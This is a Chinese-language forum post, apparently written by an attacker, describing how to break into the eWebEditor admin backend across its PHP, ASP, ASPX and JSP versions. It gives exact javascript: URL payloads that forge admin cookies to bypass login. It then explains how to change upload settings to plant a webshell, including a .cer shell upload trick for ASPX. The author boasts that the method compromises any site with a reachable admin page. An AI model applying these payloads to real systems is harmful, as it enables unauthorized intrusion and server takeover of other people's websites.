今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没


今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道


利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了。
这时候你清空浏览器的url,然后输入:


javascript:alert(document.cookie=”adminuser=”+escape(”admin”));
javascript:alert(document.cookie=”adminpass=”+escape(”admin”));
javascript:alert(document.cookie=”admindj=”+escape(”1″));


后三次回车,清空浏览器的url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件
如../ewebeditor/admin /default.php


哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了


评语:这个漏洞据小弟在2.8版本中测试一直都没有成功过,既然有人这样写我想某些版本应该是可以的。大家可以自行测试下。
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
哈哈,以后只要ewebeditor的后台可以找到的话,就可以通杀了